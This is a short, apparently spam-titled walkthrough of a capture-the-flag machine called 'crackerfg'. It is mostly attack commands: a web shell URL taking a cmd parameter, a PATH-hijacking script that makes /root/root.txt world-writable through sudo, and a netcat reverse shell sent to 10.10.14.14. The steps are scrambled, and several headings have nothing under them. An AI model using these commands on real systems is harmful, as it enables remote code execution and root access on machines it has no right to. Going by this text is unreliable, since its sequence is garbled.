Crackerfg [extra Quality] (100% SAFE)

Use gobuster:

Run strings /usr/bin/crackerfg – it calls a system command: hashgen.

http://10.10.10.10/uploads/shell.fg?cmd=id

Read the flag:

Check path hijacking:

echo '#!/bin/bash' > /tmp/hashgen
echo 'chmod 777 /root/root.txt' >> /tmp/hashgen
chmod +x /tmp/hashgen
export PATH=/tmp:$PATH
sudo /usr/bin/crackerfg

Now /root/root.txt is readable.

You get RCE as www-data.

# On attacker machine
nc -lvnp 4444

# Via the web shell
cmd=nc -e /bin/bash 10.10.14.14 4444